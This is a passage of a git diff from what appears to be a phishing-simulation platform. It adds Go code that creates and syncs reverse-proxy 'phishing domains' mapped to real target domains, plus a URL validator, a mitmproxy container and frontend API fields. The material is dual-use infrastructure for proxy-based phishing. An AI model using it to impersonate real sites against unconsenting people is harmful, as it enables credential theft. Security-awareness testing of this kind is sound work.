if err := yaml.Unmarshal([]byte(proxyConfig.String()), &config); err != nil { + return err + } + + // apply defaults + m.setProxyConfigDefaults(&config) + + // marshal back to YAML + updatedConfigBytes, err := yaml.Marshal(&config) + if err != nil { + return err + } + + // update the Proxy configuration with defaults applied + updatedConfigVO := vo.NewString1MBMust(string(updatedConfigBytes)) + proxy.ProxyConfig = nullable.NewNullableWithValue(*updatedConfigVO) + return nil +} + +// deleteProxyDomains deletes all domains associated with a proxy +func (m *Proxy) deleteProxyDomains(ctx context.Context, session *model.Session, proxyID *uuid.UUID, proxy *model.Proxy) error { + proxyConfig, err := proxy.ProxyConfig.Get() + if err != nil { + return err + } + + // parse complete YAML structure + var config ProxyServiceConfigYAML + if err := yaml.Unmarshal([]byte(proxyConfig.String()), &config); err != nil { + return err + } + + // set default values + m.setProxyConfigDefaults(&config) + + // delete domains for each mapping + for _, domainConfig := range config.Hosts { + if domainConfig == nil { + continue + } + + // get domain by name and delete if it's a proxy domain + phishingDomainVO, err := vo.NewString255(domainConfig.To) + if err != nil { + continue + } + + existingDomain, err := m.DomainRepository.GetByName(ctx, phishingDomainVO, &repository.DomainOption{}) + if err == nil && existingDomain != nil { + // delete old domains that have proxy type + if existingDomain.Type.MustGet().String() == "proxy" { + domainID, err := existingDomain.ID.Get() + if err == nil { + err = m.DomainService.DeleteProxyDomain(ctx, session, &domainID) + if err != nil { + m.Logger.Warnw("failed to delete proxy domain", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "error", err, + ) + } else { + m.Logger.Debugw("deleted proxy domain", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + ) + } + } + } + } + } + + return nil +} + +// validatePhishingDomainUniqueness checks if a phishing domain is already used by another proxy +func (m *Proxy) validatePhishingDomainUniqueness(ctx context.Context, phishingDomain string, excludeProxyID *uuid.UUID) error { + phishingDomainVO, err := vo.NewString255(phishingDomain) + if err != nil { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("invalid phishing domain format: %s", phishingDomain)), + "proxyConfig", + ) + } + + existingDomain, err := m.DomainRepository.GetByName(ctx, phishingDomainVO, &repository.DomainOption{}) + if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) { + return err + } + if existingDomain != nil { + // check if this domain is managed by a different proxy + if existingDomain.Type.MustGet().String() == "proxy" { + // check if it's managed by the same proxy we're updating (allowed) + if excludeProxyID != nil { + // this is a bit of a workaround - we'd need to track which proxy owns which domain + // for now, we'll allow updates to existing proxy domains + // TODO: add a proxy_id field to domains table for proper tracking + return nil + } + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("phishing domain '%s' is already used by another proxy", phishingDomain)), + "proxyConfig", + ) + } else { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("domain '%s' already exists as a regular domain", phishingDomain)), + "proxyConfig", + ) + } + } + return nil +} + +// validatePhishingDomainUniquenessByStartURL checks if a phishing domain is already used by another proxy using start URL comparison +func (m *Proxy) validatePhishingDomainUniquenessByStartURL(ctx context.Context, phishingDomain string, currentStartURL string) error { + phishingDomainVO, err := vo.NewString255(phishingDomain) + if err != nil { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("invalid phishing domain format: %s", phishingDomain)), + "proxyConfig", + ) + } + + existingDomain, err := m.DomainRepository.GetByName(ctx, phishingDomainVO, &repository.DomainOption{}) + if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) { + return err + } + if existingDomain != nil { + if existingDomain.Type.MustGet().String() == "proxy" { + // check if it belongs to a different proxy by comparing target domains + existingTarget, err := existingDomain.ProxyTargetDomain.Get() + if err == nil { + // extract domain from current start URL for comparison + currentStartURLParsed, err := url.Parse(currentStartURL) + if err != nil { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("invalid start URL format: %s", currentStartURL)), + "proxyConfig", + ) + } + + // normalize and extract domain for comparison + existingTargetStr := strings.ToLower(strings.TrimSpace(existingTarget.String())) + currentHostNormalized := strings.ToLower(strings.TrimSpace(currentStartURLParsed.Host)) + + // if existing target is a full URL, extract just the host part + var existingTargetNormalized string + if strings.Contains(existingTargetStr, "://") { + // it's a full URL, parse it to get the host + existingTargetParsed, err := url.Parse(existingTargetStr) + if err != nil { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("invalid existing target URL format: %s", existingTargetStr)), + "proxyConfig", + ) + } + existingTargetNormalized = strings.ToLower(strings.TrimSpace(existingTargetParsed.Host)) + } else { + // it's already just a domain + existingTargetNormalized = existingTargetStr + } + + if existingTargetNormalized != currentHostNormalized { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("phishing domain '%s' is already used by another Proxy configuration", phishingDomain)), + "proxyConfig", + ) + } + } + } else { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("domain '%s' already exists as a regular domain", phishingDomain)), + "proxyConfig", + ) + } + } + return nil +} + +// validatePhishingDomainUniquenessForUpdate validates phishing domain uniqueness during proxy updates +func (m *Proxy) validatePhishingDomainUniquenessForUpdate(ctx context.Context, phishingDomain string, currentStartURL string, currentProxyID *uuid.UUID) error { + m.Logger.Debugw("validating phishing domain uniqueness for update", + "phishingDomain", phishingDomain, + "currentStartURL", currentStartURL, + "currentProxyID", currentProxyID.String(), + ) + + phishingDomainVO, err := vo.NewString255(phishingDomain) + if err != nil { + m.Logger.Errorw("invalid phishing domain format", + "phishingDomain", phishingDomain, + "error", err, + ) + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("invalid phishing domain format: %s", phishingDomain)), + "proxyConfig", + ) + } + + existingDomain, err := m.DomainRepository.GetByName(ctx, phishingDomainVO, &repository.DomainOption{}) + if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) { + m.Logger.Errorw("error getting existing domain", + "phishingDomain", phishingDomain, + "error", err, + ) + return err + } + + if existingDomain == nil { + m.Logger.Debugw("no existing domain found, validation passed", + "phishingDomain", phishingDomain, + ) + return nil + } + + m.Logger.Debugw("existing domain found", + "phishingDomain", phishingDomain, + "existingDomainType", existingDomain.Type.MustGet().String(), + ) + + if existingDomain.Type.MustGet().String() == "proxy" { + // check if it belongs to a different proxy by comparing target domains + existingTarget, err := existingDomain.ProxyTargetDomain.Get() + if err != nil { + m.Logger.Errorw("error getting existing domain proxy target", + "phishingDomain", phishingDomain, + "error", err, + ) + return err + } + + m.Logger.Debugw("existing domain proxy target found", + "phishingDomain", phishingDomain, + "existingTarget", existingTarget.String(), + ) + + // extract domain from current start URL for comparison + currentStartURLParsed, err := url.Parse(currentStartURL) + if err != nil { + m.Logger.Errorw("error parsing current start URL", + "currentStartURL", currentStartURL, + "error", err, + ) + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("invalid start URL format: %s", currentStartURL)), + "proxyConfig", + ) + } + + // normalize and extract domain for comparison + existingTargetStr := strings.ToLower(strings.TrimSpace(existingTarget.String())) + currentHostNormalized := strings.ToLower(strings.TrimSpace(currentStartURLParsed.Host)) + + // if existing target is a full URL, extract just the host part + var existingTargetNormalized string + if strings.Contains(existingTargetStr, "://") { + // it's a full URL, parse it to get the host + existingTargetParsed, err := url.Parse(existingTargetStr) + if err != nil { + m.Logger.Errorw("error parsing existing target URL", + "existingTarget", existingTargetStr, + "error", err, + ) + return err + } + existingTargetNormalized = strings.ToLower(strings.TrimSpace(existingTargetParsed.Host)) + } else { + // it's already just a domain + existingTargetNormalized = existingTargetStr + } + + m.Logger.Debugw("comparing normalized domains", + "phishingDomain", phishingDomain, + "existingTargetStr", existingTargetStr, + "existingTargetNormalized", existingTargetNormalized, + "currentHostNormalized", currentHostNormalized, + ) + + // if target domains don't match, it belongs to a different proxy + if existingTargetNormalized != currentHostNormalized { + m.Logger.Warnw("phishing domain belongs to different proxy", + "phishingDomain", phishingDomain, + "existingTargetNormalized", existingTargetNormalized, + "currentHostNormalized", currentHostNormalized, + "currentProxyID", currentProxyID.String(), + ) + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("phishing domain '%s' is already used by another Proxy configuration (existing target: %s, current target: %s)", phishingDomain, existingTargetNormalized, currentHostNormalized)), + "proxyConfig", + ) + } + + // if target domains match, this domain belongs to the current proxy being updated, so it's allowed + m.Logger.Debugw("phishing domain belongs to current proxy, allowing reuse", + "domain", phishingDomain, + "proxyID", currentProxyID.String(), + "existingTarget", existingTargetNormalized, + "currentHost", currentHostNormalized, + ) + } else { + m.Logger.Warnw("domain exists as regular domain, not proxy", + "phishingDomain", phishingDomain, + "existingDomainType", existingDomain.Type.MustGet().String(), + ) + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("domain '%s' already exists as a regular domain", phishingDomain)), + "proxyConfig", + ) + } + return nil +} + +// createProxyDomains creates domains for the proxy based on the configuration +func (m *Proxy) createProxyDomains(ctx context.Context, session *model.Session, proxyID *uuid.UUID, proxy *model.Proxy) error { + proxyConfig, err := proxy.ProxyConfig.Get() + if err != nil { + return fmt.Errorf("failed to get proxy config: %w", err) + } + + // parse complete YAML structure + var config ProxyServiceConfigYAML + if err := yaml.Unmarshal([]byte(proxyConfig.String()), &config); err != nil { + return fmt.Errorf("failed to parse proxy config YAML: %w", err) + } + + // set default values + m.setProxyConfigDefaults(&config) + + var companyID *uuid.UUID + if cid, err := proxy.CompanyID.Get(); err == nil { + companyID = &cid + } + + startURL := proxy.StartURL.MustGet() + createdDomains := make([]string, 0) + + // create domains for each mapping + for originalDomain, domainConfig := range config.Hosts { + if domainConfig == nil { + continue + } + + if domainConfig.To == "" { + m.Logger.Warnw("empty 'to' field in domain config", + "proxyID", proxyID.String(), + "originalDomain", originalDomain, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("'to' field is required for domain mapping '%s'", originalDomain) + } + + // check if domain already exists (might be from previous failed attempt) + phishingDomainVO, err := vo.NewString255(domainConfig.To) + if err != nil { + m.Logger.Warnw("invalid phishing domain format", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "error", err, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("invalid phishing domain format %s: %w", domainConfig.To, err) + } + + existingDomain, err := m.DomainRepository.GetByName(ctx, phishingDomainVO, &repository.DomainOption{}) + if err == nil && existingDomain != nil { + // domain already exists, check if it's compatible + if existingDomain.Type.MustGet().String() == "proxy" { + existingTarget, err := existingDomain.ProxyTargetDomain.Get() + if err == nil && existingTarget.String() == startURL.String() { + // compatible existing domain, skip creation + m.Logger.Debugw("proxy domain already exists, skipping creation", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + ) + createdDomains = append(createdDomains, domainConfig.To) + continue + } + } + // incompatible domain exists + m.Logger.Warnw("incompatible domain already exists", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "existingType", existingDomain.Type.MustGet().String(), + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("domain %s already exists and is incompatible", domainConfig.To) + } else if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) { + // database error + m.Logger.Errorw("failed to check existing domain", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "error", err, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("failed to check existing domain %s: %w", domainConfig.To, err) + } + + // create new domain + domain := &model.Domain{} + domain.Name.Set(*vo.NewString255Must(domainConfig.To)) + domain.Type.Set(*vo.NewString32Must("proxy")) + domain.ProxyID.Set(*proxyID) + + // set the target domain to the original domain from the YAML config + proxyTargetDomain, err := vo.NewOptionalString255(originalDomain) + if err != nil { + m.Logger.Errorw("failed to create proxy target domain", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "startURL", startURL.String(), + "error", err, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("failed to create proxy target domain for %s: %w", domainConfig.To, err) + } + domain.ProxyTargetDomain.Set(*proxyTargetDomain) + + domain.HostWebsite.Set(false) + domain.ManagedTLS.Set(true) + domain.OwnManagedTLS.Set(false) + + pageContent, err := vo.NewOptionalString1MB("") + if err != nil { + m.Logger.Errorw("failed to create page content", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "error", err, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("failed to create page content for %s: %w", domainConfig.To, err) + } + domain.PageContent.Set(*pageContent) + + pageNotFoundContent, err := vo.NewOptionalString1MB("") + if err != nil { + m.Logger.Errorw("failed to create page not found content", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "error", err, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("failed to create page not found content for %s: %w", domainConfig.To, err) + } + domain.PageNotFoundContent.Set(*pageNotFoundContent) + + redirectURL, err := vo.NewOptionalString1024("") + if err != nil { + m.Logger.Errorw("failed to create redirect URL", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "error", err, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("failed to create redirect URL for %s: %w", domainConfig.To, err) + } + domain.RedirectURL.Set(*redirectURL) + + if companyID != nil { + domain.CompanyID.Set(*companyID) + } + + _, err = m.DomainService.CreateProxyDomain(ctx, session, domain) + if err != nil { + m.Logger.Errorw("failed to create proxy domain", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "error", err, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("failed to create domain %s: %w", domainConfig.To, err) + } + + createdDomains = append(createdDomains, domainConfig.To) + m.Logger.Debugw("created proxy domain", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + ) + } + + m.Logger.Infow("successfully created all proxy domains", + "proxyID", proxyID.String(), + "domainsCreated", len(createdDomains), + "domains", createdDomains, + ) + + return nil +} + +// rollbackCreatedDomains attempts to delete domains that were created during a failed proxy creation +func (m *Proxy) rollbackCreatedDomains(ctx context.Context, session *model.Session, createdDomains []string) { + for _, domainName := range createdDomains { + phishingDomainVO, err := vo.NewString255(domainName) + if err != nil { + m.Logger.Warnw("failed to create domain VO for rollback", + "domain", domainName, + "error", err, + ) + continue + } + + existingDomain, err := m.DomainRepository.GetByName(ctx, phishingDomainVO, &repository.DomainOption{}) + if err != nil { + m.Logger.Warnw("failed to get domain for rollback", + "domain", domainName, + "error", err, + ) + continue + } + + if existingDomain != nil && existingDomain.Type.MustGet().String() == "proxy" { + domainID, err := existingDomain.ID.Get() + if err == nil { + err = m.DomainService.DeleteProxyDomain(ctx, session, &domainID) + if err != nil { + m.Logger.Warnw("failed to rollback proxy domain", + "domain", domainName, + "error", err, + ) + } else { + m.Logger.Debugw("rolled back proxy domain", + "domain", domainName, + ) + } + } + } + } +} + +// syncProxyDomains synchronizes domains for the proxy based on the configuration +func (m *Proxy) syncProxyDomains(ctx context.Context, session *model.Session, proxyID *uuid.UUID, proxy *model.Proxy) error { + proxyConfig, err := proxy.ProxyConfig.Get() + if err != nil { + return fmt.Errorf("failed to get proxy config for sync: %w", err) + } + + // get current proxy domains by proxy ID + currentDomainsResult, err := m.DomainService.GetByProxyID(ctx, session, proxyID) + if err != nil { + return fmt.Errorf("failed to get current proxy domains: %w", err) + } + + currentDomains := make(map[string]*model.Domain) + for _, domain := range currentDomainsResult.Rows { + currentDomains[domain.Name.MustGet().String()] = domain + } + + m.Logger.Debugw("found existing proxy domains for sync", + "proxyID", proxyID.String(), + "currentDomainCount", len(currentDomains), + "currentDomains", func() []string { + domains := make([]string, 0, len(currentDomains)) + for name := range currentDomains { + domains = append(domains, name) + } + return domains + }(), + ) + + // parse complete YAML structure + var config ProxyServiceConfigYAML + if err := yaml.Unmarshal([]byte(proxyConfig.String()), &config); err != nil { + return fmt.Errorf("failed to parse proxy config YAML for sync: %w", err) + } + + // set default values + m.setProxyConfigDefaults(&config) + + // get desired domains from config + desiredDomains := make(map[string]string) // phishing domain -> original domain + for originalDomain, domainConfig := range config.Hosts { + if domainConfig == nil { + continue + } + + if domainConfig.To != "" { + desiredDomains[domainConfig.To] = originalDomain + } + } + + m.Logger.Debugw("parsed desired domains from config", + "proxyID", proxyID.String(), + "desiredDomainCount", len(desiredDomains), + "desiredDomains", func() []string { + domains := make([]string, 0, len(desiredDomains)) + for name := range desiredDomains { + domains = append(domains, name) + } + return domains + }(), + ) + + // delete domains that are no longer needed + deletedCount := 0 + for phishingDomain, domain := range currentDomains { + if _, exists := desiredDomains[phishingDomain]; !exists { + m.Logger.Debugw("domain marked for deletion", + "proxyID", proxyID.String(), + "domain", phishingDomain, + ) + domainID, err := domain.ID.Get() + if err == nil { + err = m.DomainService.DeleteProxyDomain(ctx, session, &domainID) + if err != nil { + m.Logger.Warnw("failed to delete removed proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + } else { + m.Logger.Infow("deleted removed proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + ) + deletedCount++ + } + } else { + m.Logger.Warnw("failed to get domain ID for deletion", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + } + } else { + m.Logger.Debugw("domain still needed, keeping", + "proxyID", proxyID.String(), + "domain", phishingDomain, + ) + } + } + + // create or update domains that are needed + createdCount := 0 + updatedCount := 0 + errorCount := 0 + + for phishingDomain, originalDomain := range desiredDomains { + if existingDomain, exists := currentDomains[phishingDomain]; exists { + // domain already exists, check if target domain needs updating + needsUpdate := false + currentTarget, err := existingDomain.ProxyTargetDomain.Get() + + if err != nil || currentTarget.String() != originalDomain { + // update the target domain + proxyTargetDomain, err := vo.NewOptionalString255(originalDomain) + if err == nil { + existingDomain.ProxyTargetDomain.Set(*proxyTargetDomain) + needsUpdate = true + } else { + m.Logger.Warnw("failed to create proxy target domain for update", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + errorCount++ + continue + } + } + + if needsUpdate { + domainID, err := existingDomain.ID.Get() + if err == nil { + err = m.DomainService.UpdateProxyDomain(ctx, session, &domainID, existingDomain) + if err != nil { + m.Logger.Warnw("failed to update existing proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + errorCount++ + } else { + m.Logger.Debugw("updated existing proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + ) + updatedCount++ + } + } else { + m.Logger.Warnw("failed to get domain ID for update", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + errorCount++ + } + } + } else { + // create new domain + domain := &model.Domain{} + domain.Name.Set(*vo.NewString255Must(phishingDomain)) + domain.Type.Set(*vo.NewString32Must("proxy")) + domain.ProxyID.Set(*proxyID) + + proxyTargetDomain, err := vo.NewOptionalString255(originalDomain) + if err != nil { + m.Logger.Warnw("failed to create proxy target domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "originalDomain", originalDomain, + "error", err, + ) + errorCount++ + continue + } + domain.ProxyTargetDomain.Set(*proxyTargetDomain) + + domain.HostWebsite.Set(false) + domain.ManagedTLS.Set(true) + domain.OwnManagedTLS.Set(false) + + pageContent, err := vo.NewOptionalString1MB("") + if err != nil { + m.Logger.Warnw("failed to create page content for proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + errorCount++ + continue + } + domain.PageContent.Set(*pageContent) + + pageNotFoundContent, err := vo.NewOptionalString1MB("") + if err != nil { + m.Logger.Warnw("failed to create page not found content for proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + errorCount++ + continue + } + domain.PageNotFoundContent.Set(*pageNotFoundContent) + + redirectURL, err := vo.NewOptionalString1024("") + if err != nil { + m.Logger.Warnw("failed to create redirect URL for proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + errorCount++ + continue + } + domain.RedirectURL.Set(*redirectURL) + + var companyID *uuid.UUID + if cid, err := proxy.CompanyID.Get(); err == nil { + companyID = &cid + domain.CompanyID.Set(*companyID) + } + + _, err = m.DomainService.CreateProxyDomain(ctx, session, domain) + if err != nil { + m.Logger.Warnw("failed to create new proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + errorCount++ + } else { + m.Logger.Debugw("created new proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + ) + createdCount++ + } + } + } + + m.Logger.Infow("completed proxy domain synchronization", + "proxyID", proxyID.String(), + "domainsDeleted", deletedCount, + "domainsCreated", createdCount, + "domainsUpdated", updatedCount, + "errors", errorCount, + ) + + if errorCount > 0 { + return fmt.Errorf("proxy domain sync completed with %d errors", errorCount) + } + + return nil +} + +// DeleteByID deletes a proxy by ID +func (m *Proxy) DeleteByID( + ctx context.Context, + session *model.Session, + id *uuid.UUID, +) error { + ae := NewAuditEvent("Proxy.DeleteByID", session) + ae.Details["id"] = id.String() + // check permissions + isAuthorized, err := IsAuthorized(session, data.PERMISSION_ALLOW_GLOBAL) + if err != nil && !errors.Is(err, errs.ErrAuthorizationFailed) { + m.LogAuthError(err) + return err + } + if !isAuthorized { + m.AuditLogNotAuthorized(ae) + return errs.ErrAuthorizationFailed + } + + // get current proxy before deletion to access its domains + current, err := m.ProxyRepository.GetByID(ctx, id, &repository.ProxyOption{}) + if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) { + m.Logger.Errorw("failed to get proxy for domain cleanup", "error", err) + return err + } + + // delete associated proxy domains + if current != nil { + err = m.deleteProxyDomains(ctx, session, id, current) + if err != nil { + m.Logger.Errorw("failed to delete proxy domains", "error", err) + // continue with proxy deletion even if domain cleanup fails + } + } + + // remove the relation from campaign templates + err = m.CampaignTemplateService.RemoveProxiesByProxyID( + ctx, + session, + id, + ) + if err != nil { + m.Logger.Errorw("failed to remove proxy ID relations from campaign templates", "error", err) + return err + } + + // delete proxy + err = m.ProxyRepository.DeleteByID( + ctx, + id, + ) + if err != nil { + m.Logger.Errorw("failed to delete proxy by ID", "error", err) + return err + } + m.AuditLogAuthorized(ae) + + return nil +} diff --git a/backend/validate/validate.go b/backend/validate/validate.go index 9cec9df..33cfb3e 100644 --- a/backend/validate/validate.go +++ b/backend/validate/validate.go @@ -6,6 +6,7 @@ package validate import ( "fmt" "net/mail" + "net/url" "regexp" "slices" "strings" @@ -412,3 +413,88 @@ func OneOfNullableFieldsRequired(fields map[string]any) error { keys := utils.MapKeys(fields) return fmt.Errorf("one of the fields (%s) must be supplied", strings.Join(keys, ", ")) } + +// ErrorIfInvalidURL validates that a string is a valid URL with http/https scheme +func ErrorIfInvalidURL(urlStr string) error { + if urlStr == "" { + return errs.NewValidationError( + errors.New("URL cannot be empty"), + ) + } + + // validate that URL is parseable + parsedURL, err := url.Parse(urlStr) + if err != nil { + return errs.NewValidationError( + errors.New("must be a valid URL"), + ) + } + + // ensure it has a valid scheme (http or https) + if parsedURL.Scheme != "http" && parsedURL.Scheme != "https" { + return errs.NewValidationError( + errors.New("must use http or https protocol"), + ) + } + + // ensure it has a valid host + if parsedURL.Host == "" { + return errs.NewValidationError( + errors.New("must have a valid host"), + ) + } + + // extract hostname (removes port if present) for domain validation + hostname := parsedURL.Hostname() + if hostname == "" { + return errs.NewValidationError( + errors.New("must have a valid hostname"), + ) + } + + // basic domain validation + if !isValidDomain(hostname) { + return errs.NewValidationError( + errors.New("must have a valid domain"), + ) + } + + return nil +} + +// isValidDomain performs basic domain name validation +// supports international domain names (IDNs) +func isValidDomain(domain string) bool { + // basic checks - length limits + if len(domain) == 0 || len(domain) > 253 { + return false + } + + // must contain at least one dot + if !strings.Contains(domain, ".") { + return false + } + + // cannot start or end with dash or dot + if strings.HasPrefix(domain, "-") || strings.HasSuffix(domain, "-") || + strings.HasPrefix(domain, ".") || strings.HasSuffix(domain, ".") { + return false + } + + // check each label + labels := strings.Split(domain, ".") + for _, label := range labels { + if len(label) == 0 || len(label) > 63 { + return false + } + + // label cannot start or end with dash + if strings.HasPrefix(label, "-") || strings.HasSuffix(label, "-") { + return false + } + + // removed restrictive ascii-only character check to support international domains + } + + return true +} diff --git a/backend/vo/generic.go b/backend/vo/generic.go index 4668528..6411dfd 100644 --- a/backend/vo/generic.go +++ b/backend/vo/generic.go @@ -12,6 +12,60 @@ import ( "github.com/phishingclub/phishingclub/validate" ) +// String32 is a trimmed string with a min of 1 and a max of 32 +type String32 struct { + inner string +} + +// NewString32 creates a new short string +func NewString32(s string) (*String32, error) { + s = strings.TrimSpace(s) + err := validate.ErrorIfStringNotbetweenOrEqualTo(s, 1, 32) + if err != nil { + return nil, errs.Wrap(err) + } + return &String32{ + inner: s, + }, nil +} + +// NewString32Must creates a new short string and panics if it fails +func NewString32Must(s string) *String32 { + a, err := NewString32(s) + if err != nil { + panic(err) + } + return a +} + +// MarshalJSON implements the json.Marshaler interface +func (s String32) MarshalJSON() ([]byte, error) { + return json.Marshal(s.inner) +} + +// UnmarshalJSON unmarshals the json into a string +func (s *String32) UnmarshalJSON(data []byte) error { + var str string + if err := json.Unmarshal(data, &str); err != nil { + return err + } + ss, err := NewString32(str) + if err != nil { + unwrapped := errors.Unwrap(err) + if unwrapped == nil { + return err + } + return unwrapped + } + s.inner = ss.inner + return nil +} + +// String returns the string representation of the short string +func (s String32) String() string { + return s.inner +} + // String64 is a trimmed string with a min of 1 and a max of 64 type String64 struct { inner string diff --git a/docker-compose.yml b/docker-compose.yml index 31de3e2..7345fc3 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -150,6 +150,23 @@ services: networks: - default + # mitmproxy - HTTP/HTTPS proxy for security research and debugging + # Web interface: http://localhost:8105 (check logs for auto-generated token) - Proxy available at 172.20.0.138:8080 + # Use this IP in your Proxy configs: proxy: '172.20.0.138:8080' + mitmproxy: + image: mitmproxy/mitmproxy:latest + command: mitmweb --web-host 0.0.0.0 --web-port 8080 --listen-port 8081 --no-web-open-browser + tty: true + ports: + - "8105:8080" # Web interface + - "8106:8081" # Proxy port (for external access) + volumes: + - mitmproxy_data:/home/mitmproxy/.mitmproxy + restart: unless-stopped + networks: + default: + ipv4_address: 172.20.0.138 + # DNS Server for .test domain resolution dns: restart: always @@ -166,6 +183,9 @@ services: default: ipv4_address: 172.20.0.137 +volumes: + mitmproxy_data: + networks: default: driver: bridge diff --git a/frontend/src/lib/api/api.js b/frontend/src/lib/api/api.js index a998180..504fe62 100644 --- a/frontend/src/lib/api/api.js +++ b/frontend/src/lib/api/api.js @@ -907,8 +907,11 @@ export class API { * @param {string} template.companyID * @param {string} template.domainID * @param {string} template.beforeLandingPageID + * @param {string} template.beforeLandingProxyID * @param {string} template.afterLandingPageID + * @param {string} template.afterLandingProxyID * @param {string} template.landingPageID + * @param {string} template.landingProxyID * @param {string} template.smtpConfigurationID * @param {string} template.apiSenderID * @param {string} template.afterLandingPageRedirectURL @@ -923,8 +926,11 @@ export class API { companyID, domainID, beforeLandingPageID, + beforeLandingProxyID, afterLandingPageID, + afterLandingProxyID, landingPageID, + landingProxyID, smtpConfigurationID, apiSenderID, urlIdentifierID, @@ -937,8 +943,11 @@ export class API { companyID: companyID, domainID: domainID, beforeLandingPageID: beforeLandingPageID, + beforeLandingProxyID: beforeLandingProxyID, afterLandingPageID: afterLandingPageID, + afterLandingProxyID: afterLandingProxyID, landingPageID: landingPageID, + landingProxyID: landingProxyID, smtpConfigurationID: smtpConfigurationID, apiSenderID: apiSenderID, afterLandingPageRedirectURL: afterLandingPageRedirectURL, @@ -957,8 +966,11 @@ export class API { * @param {string} template.companyID * @param {string} template.domainID * @param {string} template.beforeLandingPageID + * @param {string} template.beforeLandingProxyID * @param {string} template.afterLandingPageID + * @param {string} template.afterLandingProxyID * @param {string} template.landingPageID + * @param {string} template.landingProxyID * @param {string} template.smtpConfigurationID * @param {string} template.apiSenderID * @param {string} template.afterLandingPageRedirectURL @@ -974,8 +986,11 @@ export class API { companyID, domainID, beforeLandingPageID, + beforeLandingProxyID, afterLandingPageID, + afterLandingProxyID, landingPageID, + landingProxyID, smtpConfigurationID, apiSenderID, afterLandingPageRedirectURL, @@ -989,8 +1004,11 @@ export class API { companyID: companyID, domainID: domainID, beforeLandingPageID: beforeLandingPageID, + beforeLandingProxyID: beforeLandingProxyID, afterLandingPageID: afterLandingPageID, + afterLandingProxyID: afterLandingProxyID, landingPageID: landingPageID, + landingProxyID: landingProxyID, smtpConfigurationID: smtpConfigurationID, apiSenderID: apiSenderID, afterLandingPageRedirectURL: afterLandingPageRedirectURL, @@ -1092,6 +1110,8 @@ export class API { * * @param {object} domain * @param {string} domain.name + * @param {string} domain.type + * @param {string} domain.proxyTargetDomain * @param {boolean} domain.managedTLS * @param {boolean} domain.ownManagedTLS * @param {string} domain.ownManagedTLSKey @@ -1105,6 +1125,8 @@ export class API { */ create: async ({ name, + type, + proxyTargetDomain, managedTLS, ownManagedTLS, ownManagedTLSKey, @@ -1117,6 +1139,8 @@ export class API { }) => { return await postJSON(this.getPath('/domain/'), { name: name, + type: type, + proxyTargetDomain: proxyTargetDomain, managedTLS: managedTLS, ownManagedTLS: ownManagedTLS, ownManagedTLSKey: ownManagedTLSKey, @@ -1134,19 +1158,23 @@ export class API { * * @param {object} domain * @param {string} domain.id + * @param {string} [domain.type] + * @param {string} [domain.proxyTargetDomain] * @param {boolean} domain.managedTLS * @param {boolean} domain.ownManagedTLS * @param {string} domain.ownManagedTLSKey * @param {string} domain.ownManagedTLSPem - * @param {boolean} domain.hostWebsite - * @param {string} domain.pageContent - * @param {string} domain.pageNotFoundContent - * @param {string} domain.redirectURL + * @param {boolean} [domain.hostWebsite] + * @param {string} [domain.pageContent] + * @param {string} [domain.pageNotFoundContent] + * @param {string} [domain.redirectURL] * @param {string} domain.companyID * @returns {Promise} */ update: async ({ id, + type, + proxyTargetDomain, managedTLS, ownManagedTLS, ownManagedTLSKey, @@ -1157,17 